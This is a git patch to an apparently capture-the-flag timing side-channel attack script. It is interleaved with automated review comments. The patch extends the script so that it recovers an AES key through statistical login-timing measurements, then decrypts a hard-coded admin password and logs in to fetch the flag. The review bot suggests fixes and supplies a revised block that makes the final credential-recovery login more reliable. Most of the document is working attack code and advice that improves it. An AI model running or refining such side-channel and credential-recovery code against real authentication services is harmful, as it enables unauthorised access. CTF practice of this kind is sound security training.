From de80694af5468adb36e7f97558e1c4f42e85f3a4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Manuel=20V=C3=B6gele?=
Date: Tue, 2 Jul 2019 19:13:17 +0200
Subject: [PATCH] The automated attack now goes all the way of fetching the flag

---
 break_script/automated_attack.py | 27 ++++++++++++++++++++-------
 1 file changed, 20 insertions(+), 7 deletions(-)

diff --git a/break_script/automated_attack.py b/break_script/automated_attack.py
index bbb7934..d75a230 100755
--- a/break_script/automated_attack.py
+++ b/break_script/automated_attack.py
@@ -6,6 +6,8 @@ import string
 import math
 import threading
 
+from Crypto.Cipher import AES
+
 #context.log_level = "debug"
 
 allowed_chars = string.ascii_letters + string.digits + string.punctuation
@@ -51,7 +53,7 @@ def gather_measurements_(r, amount, total_amount, measurements, progress, lock):
     r.recvuntil(b"> ")
     password = ''.join(random.choices(allowed_chars, k=16)).encode("ascii")
     r.send(b"login\n")
-    r.send(password)
+    r.send("admin")
     r.send(b"\n")
     r.send(password)
     r.send(b"\n")
@@ -87,11 +89,11 @@ def t_test(group_big, group_small):
     variance_small = variance(group_small, mean_small)
     return (mean_big - mean_small) / math.sqrt(variance_big / len(group_big) + variance_small / len(group_small))
 
-#remotes = [process("/home/manuel/wolke/Projects/secutech_authenticator/build/default/secutech")]
-remotes = []
-no_threads = 50
-for i in range(no_threads):
-    remotes.append(remote("ccn.li", "5555"))
+remotes = [process("/home/manuel/wolke/Projects/secutech_authenticator/build/meson.debug.linux.x86_64/secutech", cwd="/home/manuel/wolke/Projects/secutech_authenticator")]
+#remotes = []
+#no_threads = 50
+#for i in range(no_threads):
+#    remotes.append(remote("ccn.li", "5555"))
 
 for r in remotes:
     r.recvuntil(b"> ")
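Review bot: The `Crypto` namespace in the added `from Crypto.Cipher import AES` is provided both by the long-unmaintained PyCrypto and by its maintained drop-in fork PyCryptodome, and nothing in this diff records which one the script was run against, so whoever re-runs it gets whichever package happens to be installed. I would state the dependency next to the import, `# needs pycryptodome (maintained drop-in for the abandoned PyCrypto)`, and pin it wherever the project lists requirements; importing the fork's own namespace, `from Cryptodome.Cipher import AES`, is the alternative that cannot silently resolve to PyCrypto. The script only uses one-block ECB decryption here, so the API surface is identical in both packages.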
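Review bot: `r.send("admin")` is the only send in this function that passes a str; every neighbouring call uses a bytes literal, and pwntools has to pick an encoding for text on its own. Use `r.send(b"admin")`, or collapse the three writes into one `r.send(b"login\nadmin\n")`, which is the form the final login near the end of the file already uses. The user name is now hard-coded in both places; a module-level `TARGET_USER = b"admin"` would keep the measurement phase and the final login in step. gather_measurements_ starts before this hunk and continues after it.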
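Review bot: The new `remotes` line hard-codes two absolute paths under `/home/manuel/...`, so the script now runs only on the author's machine, and the remote configuration it replaces survives only as commented-out code to be toggled by hand. I would take the binary path or the host and port from the command line (importing `sys` if it is not already) and keep both branches live, e.g. `remotes = [process(sys.argv[1])] if len(sys.argv) > 1 else [remote("ccn.li", "5555") for _ in range(no_threads)]`, and drop the commented lines. Note also that a single local `process` gives up the fifty-way parallelism the remote list had, and timings taken from a `meson.debug` build may not match the deployed target, so the 4.5 t-value threshold used further down may be worth re-checking when switching back.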
@@ -134,7 +136,7 @@ while len(key) < 16:
     # The biggest value in the list is our best guess for the value
     max_t_value = max(t_values)
     candidate = t_values.index(max_t_value)
-    progress.success("{:02X} ({:.2})".format(candidate, max_t_value))
+    progress.success("{:02X} ({:})".format(candidate, max_t_value))
 
     # Check if we are certain enough to add this result to the key. If not stop attacking and gather more measurements
     if max_t_value >= 4.5:
@@ -142,7 +144,18 @@ while len(key) < 16:
     else:
         break
 
+encrypted_adminpw = bytes([0xe3, 0x07, 0x2e, 0x9f, 0x5b, 0xe8, 0xed, 0xd6, 0x02, 0xab, 0x89, 0xb8, 0xeb, 0x49, 0xcc, 0x56])
+aes = AES.new(bytes(key), AES.MODE_ECB)
+adminpw = aes.decrypt(encrypted_adminpw)
+remotes[0].send("login\nadmin\n")
+remotes[0].send(adminpw)
+remotes[0].send("\n")
+remotes[0].recvuntil("Password: ")
+flag = remotes[0].recvuntil("\n")
+
 for r in remotes:
     r.close()
 
 print("Key:", " ".join(["{:02X}".format(k) for k in key]))
+print("Adminpw:", adminpw.decode("ascii"))
+print("Flag:", flag.decode("ascii"))
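Review bot: `{:}` on the new line prints the float's full repr, which is noisier than the two-digit output the old line was aiming for; the old `{:.2}` gives two significant digits rather than two decimals, so a t-value such as 12.3 came out as `1.2e+01`, which is presumably what prompted the change. `{:.2f}` is the fixed-point form that was intended: `progress.success("{:02X} ({:.2f})".format(candidate, max_t_value))`. The enclosing `while len(key) < 16:` loop begins before this hunk and continues after it.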
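Review bot: The final login has no failure path: if the recovered key is wrong, `aes.decrypt` returns 16 bytes of garbage that are sent as the password, and `remotes[0].recvuntil("Password: ")` followed by `recvuntil("\n")` then blocks without a timeout, so the script hangs instead of reporting a bad key; a decrypted block containing a newline would corrupt the line protocol even earlier, and the later `adminpw.decode("ascii")` would raise for any non-ASCII byte. I would refuse to send a block that is not printable ASCII (the existing `.decode("ascii")` already assumes that), give both reads a timeout and treat an empty result as failure, and use bytes literals as the rest of the file does. The hard-coded `encrypted_adminpw` constant also needs a comment stating where the ciphertext was obtained, since anyone pointing the attack at another target has to replace it. Whether the line read after the `Password: ` prompt is the server's success output or something else I cannot tell from the diff.
```python
encrypted_adminpw = bytes([0xe3, 0x07, 0x2e, 0x9f, 0x5b, 0xe8, 0xed, 0xd6, 0x02, 0xab, 0x89, 0xb8, 0xeb, 0x49, 0xcc, 0x56])  # TODO: note where this ciphertext was taken from
aes = AES.new(bytes(key), AES.MODE_ECB)
adminpw = aes.decrypt(encrypted_adminpw)
# A wrong key decrypts to garbage; refuse to send it rather than hang on the prompt below.
if not all(0x20 <= c < 0x7f for c in adminpw):
    raise SystemExit("recovered key does not decrypt to a printable password: %r" % adminpw)
target = remotes[0]
target.send(b"login\nadmin\n")
target.send(adminpw + b"\n")
if not target.recvuntil(b"Password: ", timeout=5):
    raise SystemExit("no password prompt from target")
flag = target.recvuntil(b"\n", timeout=5)
if not flag:
    raise SystemExit("login with the recovered password produced no flag line")
# … unchanged: close remotes, print key / adminpw / flag …
```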